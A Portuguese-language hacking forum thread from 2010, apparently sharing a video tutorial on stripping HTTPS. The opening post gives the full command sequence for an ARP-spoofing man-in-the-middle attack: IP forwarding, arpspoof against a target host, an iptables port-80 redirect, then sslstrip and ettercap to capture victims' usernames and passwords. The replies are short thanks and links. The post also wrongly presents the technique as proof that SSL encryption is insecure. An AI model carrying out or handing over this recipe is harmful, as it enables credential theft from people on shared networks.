[Video aula]Sniffer SSL - https

Started by Bhiór, 23 de April , 2010, 06:35:19 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Bhiór

23 de April , 2010, 06:35:19 PM
    Nesta video vou mostrar como a
criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

rogramas usados:
[LIST=1]

Comando usados:
Quotekate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i eth0

OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0"

Todas os programas são encontrados no backtrack 4

Download da video:
Quotehttp://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html
Assista on-line:
Quotehttp://blip.tv/file/3525086

guioximitsu

#1
19 de May , 2010, 01:30:37 PM
Muito boa a informação  ;)
Vlw

Obs.:O link dos softwares usados não estão funcionando =)
"Inteligência busca Sabedoria"

Bhiór

#2
04 de February , 2011, 11:02:40 PM
Se tira o excesso de http rsrs, alguma configuração do forum.

0fx66

#3
27 de August , 2011, 01:54:50 PM
Legal o vídeo, eu também criei 3 vídeos com o mesmo tema:

http://www.youtube.com/playlist?list=PLA3B83F424F9DFCD2

[]s!
Print
Go Up Pages1
User actions